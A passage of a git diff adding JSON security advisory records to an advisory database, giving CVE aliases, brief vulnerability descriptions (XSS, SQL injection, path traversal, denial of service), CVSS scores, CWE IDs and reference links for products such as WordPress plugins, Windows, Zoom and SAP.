"https://talosintelligence.com/vulnerability_reports/TALOS-2023-1862" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1862" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cw34-gw9h-rxc6/GHSA-cw34-gw9h-rxc6.json b/advisories/unreviewed/2024/04/GHSA-cw34-gw9h-rxc6/GHSA-cw34-gw9h-rxc6.json new file mode 100644 index 00000000000..afdbb38a3b4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cw34-gw9h-rxc6/GHSA-cw34-gw9h-rxc6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cw34-gw9h-rxc6", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28900" + ], + "details": "Windows Remote Access Connection Manager Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28900" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28900" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-126" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cw53-9wpp-83r6/GHSA-cw53-9wpp-83r6.json b/advisories/unreviewed/2024/04/GHSA-cw53-9wpp-83r6/GHSA-cw53-9wpp-83r6.json new file mode 100644 index 00000000000..768b69cd450 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cw53-9wpp-83r6/GHSA-cw53-9wpp-83r6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cw53-9wpp-83r6", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31348" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Testimonials allows Stored XSS.This issue affects Testimonials: from n/a through 3.0.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31348" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/super-testimonial/wordpress-super-testimonials-plugin-3-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cw5w-c3p6-8w6w/GHSA-cw5w-c3p6-8w6w.json b/advisories/unreviewed/2024/04/GHSA-cw5w-c3p6-8w6w/GHSA-cw5w-c3p6-8w6w.json new file mode 100644 index 00000000000..64e7a9b5048 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cw5w-c3p6-8w6w/GHSA-cw5w-c3p6-8w6w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cw5w-c3p6-8w6w", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-27242" + ], + "details": "Cross site scripting in Zoom Desktop Client for Linux before version 5.17.10 may allow an authenticated user to conduct a denial of service via network access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27242" + }, + { + "type": "WEB", + "url": "https://www.zoom.com/en/trust/security-bulletin/zsb-24013" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cw6g-w5px-p549/GHSA-cw6g-w5px-p549.json b/advisories/unreviewed/2024/04/GHSA-cw6g-w5px-p549/GHSA-cw6g-w5px-p549.json new file mode 100644 index 00000000000..43732344a31 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cw6g-w5px-p549/GHSA-cw6g-w5px-p549.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cw6g-w5px-p549", + "modified": "2024-04-08T09:31:14Z", + "published": "2024-04-08T09:31:14Z", + "aliases": [ + "CVE-2024-31375" + ], + "details": "Missing Authorization vulnerability in Saleswonder.Biz Team WP2LEADS.This issue affects WP2LEADS: from n/a through 3.2.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31375" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp2leads/wordpress-wp2leads-plugin-3-2-7-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cwrx-2mp2-4j43/GHSA-cwrx-2mp2-4j43.json b/advisories/unreviewed/2024/04/GHSA-cwrx-2mp2-4j43/GHSA-cwrx-2mp2-4j43.json new file mode 100644 index 00000000000..59b9712d5ab --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cwrx-2mp2-4j43/GHSA-cwrx-2mp2-4j43.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cwrx-2mp2-4j43", + "modified": "2024-04-07T18:30:29Z", + "published": "2024-04-07T18:30:29Z", + "aliases": [ + "CVE-2024-31233" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sizam Rehub.This issue affects Rehub: from n/a through 19.6.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31233" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/rehub-theme/wordpress-rehub-theme-19-6-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cwxc-rm5r-crmq/GHSA-cwxc-rm5r-crmq.json b/advisories/unreviewed/2024/04/GHSA-cwxc-rm5r-crmq/GHSA-cwxc-rm5r-crmq.json new file mode 100644 index 00000000000..404cf6adcf7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cwxc-rm5r-crmq/GHSA-cwxc-rm5r-crmq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cwxc-rm5r-crmq", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2733" + ], + "details": "The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's \"Separator\" element in all versions up to, and including, 4.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2733" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064413/bold-page-builder/trunk/content_elements/bt_bb_separator/bt_bb_separator.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2db39ae2-6c44-4a4c-84de-9b7041bece37?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cx5j-3q3c-fg8h/GHSA-cx5j-3q3c-fg8h.json b/advisories/unreviewed/2024/04/GHSA-cx5j-3q3c-fg8h/GHSA-cx5j-3q3c-fg8h.json new file mode 100644 index 00000000000..aca1ad699eb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cx5j-3q3c-fg8h/GHSA-cx5j-3q3c-fg8h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cx5j-3q3c-fg8h", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26183" + ], + "details": "Windows Kerberos Denial of Service Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26183" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26183" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-cx69-4g9j-c8p8/GHSA-cx69-4g9j-c8p8.json b/advisories/unreviewed/2024/04/GHSA-cx69-4g9j-c8p8/GHSA-cx69-4g9j-c8p8.json new file mode 100644 index 00000000000..54891fa9a8e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-cx69-4g9j-c8p8/GHSA-cx69-4g9j-c8p8.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cx69-4g9j-c8p8", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2024-27897" + ], + "details": "Input verification vulnerability in the call module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27897" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f2gr-27p7-5q73/GHSA-f2gr-27p7-5q73.json b/advisories/unreviewed/2024/04/GHSA-f2gr-27p7-5q73/GHSA-f2gr-27p7-5q73.json new file mode 100644 index 00000000000..efacc5dc8f2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f2gr-27p7-5q73/GHSA-f2gr-27p7-5q73.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f2gr-27p7-5q73", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3093" + ], + "details": "The Font Farsi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including 1.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3093" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/7c87fcd2-6ffd-4285-bbf5-36efea70b620" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ec96107-ae41-4886-8a46-5a2d6dd62aae?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f326-f55x-34r3/GHSA-f326-f55x-34r3.json b/advisories/unreviewed/2024/04/GHSA-f326-f55x-34r3/GHSA-f326-f55x-34r3.json new file mode 100644 index 00000000000..91b92377efe --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f326-f55x-34r3/GHSA-f326-f55x-34r3.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f326-f55x-34r3", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2024-3430" + ], + "details": "A vulnerability was found in QKSMS up to 3.9.4 on Android. It has been classified as problematic. This affects an unknown part of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259611. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3430" + }, + { + "type": "WEB", + "url": "https://github.com/moezbhatti/qksms" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259611" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259611" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.307756" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-530" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f34r-fpcq-6r8w/GHSA-f34r-fpcq-6r8w.json b/advisories/unreviewed/2024/04/GHSA-f34r-fpcq-6r8w/GHSA-f34r-fpcq-6r8w.json new file mode 100644 index 00000000000..f413b6691df --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f34r-fpcq-6r8w/GHSA-f34r-fpcq-6r8w.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f34r-fpcq-6r8w", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29750" + ], + "details": "In km_exp_did_inner of kmv.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29750" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f3g2-hmgr-q2mj/GHSA-f3g2-hmgr-q2mj.json b/advisories/unreviewed/2024/04/GHSA-f3g2-hmgr-q2mj/GHSA-f3g2-hmgr-q2mj.json new file mode 100644 index 00000000000..ecdfae17d66 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f3g2-hmgr-q2mj/GHSA-f3g2-hmgr-q2mj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3g2-hmgr-q2mj", + "modified": "2024-04-09T03:30:53Z", + "published": "2024-04-09T03:30:53Z", + "aliases": [ + "CVE-2024-30218" + ], + "details": "The ABAP Application Server of SAP NetWeaver as well as ABAP Platform allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. This leads to a considerable impact on availability.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30218" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3359778" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f3hc-9q6r-j846/GHSA-f3hc-9q6r-j846.json b/advisories/unreviewed/2024/04/GHSA-f3hc-9q6r-j846/GHSA-f3hc-9q6r-j846.json new file mode 100644 index 00000000000..fdd97c01af0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f3hc-9q6r-j846/GHSA-f3hc-9q6r-j846.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3hc-9q6r-j846", + "modified": "2024-04-05T18:30:35Z", + "published": "2024-04-05T18:30:35Z", + "aliases": [ + "CVE-2024-31849" + ], + "details": "A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31849" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/research/tra-2024-09" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f3q5-vrp5-crqj/GHSA-f3q5-vrp5-crqj.json b/advisories/unreviewed/2024/04/GHSA-f3q5-vrp5-crqj/GHSA-f3q5-vrp5-crqj.json new file mode 100644 index 00000000000..2d72b9910f5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f3q5-vrp5-crqj/GHSA-f3q5-vrp5-crqj.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3q5-vrp5-crqj", + "modified": "2024-04-07T21:30:28Z", + "published": "2024-04-07T21:30:28Z", + "aliases": [ + "CVE-2024-31949" + ], + "details": "In FRRouting (FRR) through 9.1, an infinite loop can occur when receiving a MP/GR capability as a dynamic capability because malformed data results in a pointer not advancing.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31949" + }, + { + "type": "WEB", + "url": "https://github.com/FRRouting/frr/pull/15640" + }, + { + "type": "WEB", + "url": "https://github.com/FRRouting/frr/pull/15640/commits/30a332dad86fafd2b0b6c61d23de59ed969a219b" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T21:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f3x6-c3gw-gv5x/GHSA-f3x6-c3gw-gv5x.json b/advisories/unreviewed/2024/04/GHSA-f3x6-c3gw-gv5x/GHSA-f3x6-c3gw-gv5x.json new file mode 100644 index 00000000000..c678db68df3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f3x6-c3gw-gv5x/GHSA-f3x6-c3gw-gv5x.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3x6-c3gw-gv5x", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3266" + ], + "details": "The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of widgets in all versions up to, and including, 4.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3266" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064413/bold-page-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21fed5a3-1bb2-4581-95b4-badff98bed42?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f43f-crxx-fcfm/GHSA-f43f-crxx-fcfm.json b/advisories/unreviewed/2024/04/GHSA-f43f-crxx-fcfm/GHSA-f43f-crxx-fcfm.json new file mode 100644 index 00000000000..2827c517067 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f43f-crxx-fcfm/GHSA-f43f-crxx-fcfm.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f43f-crxx-fcfm", + "modified": "2024-04-06T09:31:02Z", + "published": "2024-04-06T09:31:02Z", + "aliases": [ + "CVE-2024-1428" + ], + "details": "The Element Pack Elementor Addons (Header Footer, Free Template Library, Grid, Carousel, Table, Parallax Animation, Register Form, Twitter Grid) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘element_pack_wrapper_link’ attribute of the Trailer Box widget in all versions up to, and including, 5.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1428" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bdthemes-element-pack-lite/tags/5.4.14/modules/trailer-box/widgets/trailer-box.php#L2063" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3047402/bdthemes-element-pack-lite/trunk/modules/wrapper-link/module.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/543c4d52-0e47-4bbb-b53e-dbe3f104734f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f4mq-rqpq-pqgh/GHSA-f4mq-rqpq-pqgh.json b/advisories/unreviewed/2024/04/GHSA-f4mq-rqpq-pqgh/GHSA-f4mq-rqpq-pqgh.json new file mode 100644 index 00000000000..0c0d62d2729 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f4mq-rqpq-pqgh/GHSA-f4mq-rqpq-pqgh.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f4mq-rqpq-pqgh", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30683" + ], + "details": "A buffer overflow vulnerability has been discovered in the C++ components of ROS2 Iron Irwini versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via improper handling of arrays or strings.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30683" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30683" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f54w-4qr9-j5hw/GHSA-f54w-4qr9-j5hw.json b/advisories/unreviewed/2024/04/GHSA-f54w-4qr9-j5hw/GHSA-f54w-4qr9-j5hw.json new file mode 100644 index 00000000000..3609e0842a5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f54w-4qr9-j5hw/GHSA-f54w-4qr9-j5hw.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f54w-4qr9-j5hw", + "modified": "2024-04-07T15:30:32Z", + "published": "2024-04-07T15:30:31Z", + "aliases": [ + "CVE-2024-3421" + ], + "details": "A vulnerability was found in SourceCodester Online Courseware 1.0. It has been classified as critical. This affects an unknown part of the file admin/deactivatestud.php. The manipulation of the argument selector leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259593 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3421" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-06.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259593" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259593" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311599" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f6rh-8x43-h7fg/GHSA-f6rh-8x43-h7fg.json b/advisories/unreviewed/2024/04/GHSA-f6rh-8x43-h7fg/GHSA-f6rh-8x43-h7fg.json new file mode 100644 index 00000000000..3f5cb688006 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f6rh-8x43-h7fg/GHSA-f6rh-8x43-h7fg.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f6rh-8x43-h7fg", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-23084" + ], + "details": "Apfloat v1.10.1 was discovered to contain an ArrayIndexOutOfBoundsException via the component org.apfloat.internal.DoubleCRTMath::add(double[], double[]).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23084" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/5b7dd0a87db14d9c95d4c0ea62e0195b" + }, + { + "type": "WEB", + "url": "https://github.com/mtommila/apfloat" + }, + { + "type": "WEB", + "url": "http://apfloat.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T23:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-f8c8-rxc7-wvjc/GHSA-f8c8-rxc7-wvjc.json b/advisories/unreviewed/2024/04/GHSA-f8c8-rxc7-wvjc/GHSA-f8c8-rxc7-wvjc.json new file mode 100644 index 00000000000..50391c4391e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-f8c8-rxc7-wvjc/GHSA-f8c8-rxc7-wvjc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f8c8-rxc7-wvjc", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26098" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to 